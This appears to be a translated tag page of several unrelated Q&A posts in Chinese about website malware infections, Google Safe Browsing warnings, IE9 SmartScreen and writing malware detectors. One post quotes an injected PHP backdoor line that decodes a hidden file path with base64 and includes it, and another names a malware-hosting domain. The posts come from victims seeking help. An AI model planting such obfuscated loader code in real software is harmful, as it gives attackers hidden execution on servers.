问题标签 [malware-detection]

我的网站（非常大的社区网站）最近感染了病毒。每个index.php文件都已更改，因此这些文件的开始 php 标记已更改为以下行：

当我对此进行解码时，它产生了以下 PHP 代码：

我已经尝试了几种方法来清除病毒，甚至从备份中恢复，并且文件在几分钟或几小时后被重新感染。那么你能帮帮我吗？

你对这种病毒了解多少？

是否存在用于安装和传播的已知安全漏洞？

上面的 php 代码实际上做了什么？

它嵌入到 iframe 中的页面有什么作用？

当然更重要的是：我能做些什么来摆脱它？

请帮忙，我们几乎没有想法和希望:(

UPDATE1 更多细节：奇怪的是：当我们第一次检查受感染的文件时。它们已更改，但在某些情况下，它们在 ftp 程序中的修改时间显示上次访问是几天、几个月甚至几年前！这怎么可能？它让我疯狂！

更新 2 我认为问题是在用户在他的 Wordpress 安装中安装插件后引发的。从备份恢复并完全删除 Wordpress 文件夹和关联的数据库后，问题似乎消失了。我们目前订阅了一项安全服务，他们正在调查这个问题，以确保黑客永远消失。感谢任何回复的人。

好的，我对 php 很陌生，但我知道它可以读取目录和文件。

我一直在我们的一个站点上与恶意软件问题作斗争，我需要编写一个脚本来在我的主机空间上搜索它。

黑客在文件中放入的代码是

*/ $DUOIEK = base64_decode("L2hvbWUvdXNlcnMvd2ViL2IxNjQzL3NsLnRoZWNoZXNzL3B1YmxpY19odG1sL01lZGNvdXJ0QmFja3Vwb2N0MjAwNy9NZWRjb3VydEJhY2t1cG9jdDIwMDctMi9iMmIgY3VzdG9tZXIvQnViYmxlcG9zdCBCYWNrIHVwL3B1YmxpY19odG1sL0JhY2t1cHMvTWVkaWFzdWZhY2UgMjAwNS9IZWxwIGFuZCBkb2N1bWVudGF0aW9uL2phdmEgYXBpL0phdmFBUEkvY29tL21lZGlhc3VyZmFjZS9kYXRhdHlwZXMvc2VhcmNoaW5nL2NsYXNzLXVzZS90c2Rlby5waHA="); @include_once $DUOIEK;/* */?>

我不知道这是什么，但是当它出现时，谷歌会阻止我的网站。

我必须下载所有文件然后在dreamweaver中搜索它用空格替换这个废话并将它放回去。

我需要一个脚本来在谷歌之前检测到这一点。

如果有人可以给我一些指示，那就太好了

我相信这是每个​​人现在或以后都会面临的问题。

警告：这里有些不对劲！www.mywebsite.com 包含恶意软件。如果您访问此站点，您的计算机可能会感染病毒。如果您继续，Google 发现恶意软件可能会安装到您的计算机上。如果您过去曾访问过此站点或您信任此站点，则它可能最近刚刚被黑客入侵。你不应该继续，也许明天再试一次或去别的地方。我们已经通知 www.mywebsite.com 我们在该网站上发现了恶意软件。有关在 www.mywebsite.com 上发现的问题的更多信息，请访问 Google 安全浏览诊断页面。

如果您了解访问本网站可能会损害您的计算机，请继续。

我们的一个网站现已关闭，看起来像这样。这是什么原因？请帮忙。

我可能会编写一个程序来检测恶意（或非恶意）软件，即按键记录（记录按键以获取信息）。

1. 会使用什么战术？
   • 是否有特定的代码要查找？
   • 我应该搜索某些位置吗？
2. 我更喜欢 Java 或 Perl，因为我精通这些语言
   • 这些语言会起作用吗？
   • 有没有更好的语言可以用于这种情况？
3. 会用什么？
   • 代码？
   • 算法？
   • 功能？

我们提供可从我们的网站以 InstallShield EXE 形式下载的 Windows 程序。

当运行 IE9 的人尝试下载并运行我们的软件时，他们会在屏幕底部看到以下消息：

我已阅读http://blogs.msdn.com/b/ie/archive/2011/03/22/smartscreen-174-application-reputation-building-reputation.aspx

它建议：

• 使用 Authenticode 签名对您的程序进行数字签名。
• 确保下载不会被检测为恶意软件。
• 申请 Windows 徽标。

我们已经完成了所有三件事。我们的EXE是用authenticode签名进行数字签名的（警告信息上方的条是橙色的，不是红色的，表示IE9识别并验证了签名）。我们尝试过的任何防病毒程序都不会将我们的下载检测为恶意软件。我们已经申请并收到了一个Windows Logo。

到目前为止，我们的大多数客户都没有使用 IE 9。但这对那些使用 IE 9 的人来说非常麻烦。对此我们还能做些什么，还是我们只需要等到大量客户下载此软件后，此消息才会消失？

（这是否意味着当我们发布新版本时，所有 IE 9 用户都会再次收到此消息，直到有足够多的用户下载它？）

2011-06-14 更新：

谢谢，@EricLaw-MSFT。URL 是http://dakim.dakiminc.netdna-cdn.com/DakimBrainFitness.exe。（可在http://www.dakim.com上的“下载免费试用版”按钮上找到。）

我们只在短时间内提供可下载的试用版。我们的主要分发方法是安装 DVD。

我是普通用户，没有很强的编程背景。

我有一台 64 位双核机器（Dell Vostro 3400），我想我可以用这台机器运行多线程程序（是吗？）

我认为可以转换为多线程程序的程序是这样的：

http://code.google.com/p/malwarecookbook/source/browse/trunk/3/8/pescanner.py

有可能这样做吗？如果是，应该编辑哪个部分才能正常工作？

谢谢。

我正在尝试查找导致网站重定向的恶意软件。很可能它正在使用 header("location: ...") 所以我想知道有没有办法确定哪个脚本文件正在调用 header()

任何帮助表示赞赏

我很想知道恶意软件检测（如谷歌的安全浏览）技术是如何工作的？谷歌搜索对我的事业没有帮助。我发现了一些叫做cuckoobox的东西，它可以做这样的事情。

网站的恶意软件检测究竟是如何工作的？那可能是什么算法？谷歌安全浏览等使用什么算法？

任何可用的python脚本？

我的 wordpress 一直运行良好（它已更新），然后今天早上我收到了来自谷歌的关于访问我的网站的警告。当我点击详细信息时，我收到以下消息。我一起去禁用了我的评论。删除了我认为可能导致它的插件。我不确定还能做什么。我现在需要帮助吗？感谢您花时间听取我的案子！

Google 访问该网站时发生了什么？在过去 90 天内我们在网站上测试的 7 个页面中，有 7 个页面导致恶意软件在未经用户同意的情况下被下载和安装。Google 上一次访问该站点是在 2012-03-07，最后一次在该站点上发现可疑内容是在 2012-03-07。恶意软件托管在 1 个域上，包括 happynewyear.osa.pl/。

该站点托管在 1 个网络上，包括 AS29873 (BIZLAND)。

我在任何地方都没有找到这方面的信息。病毒签名是否有最低要求的长度？我在 Peter Szor 的书中读到，对于 16 位应用程序，16 个字节甚至足以避免误报。32 位和 64 位应用程序是否也有同等的最低要求？

谢谢。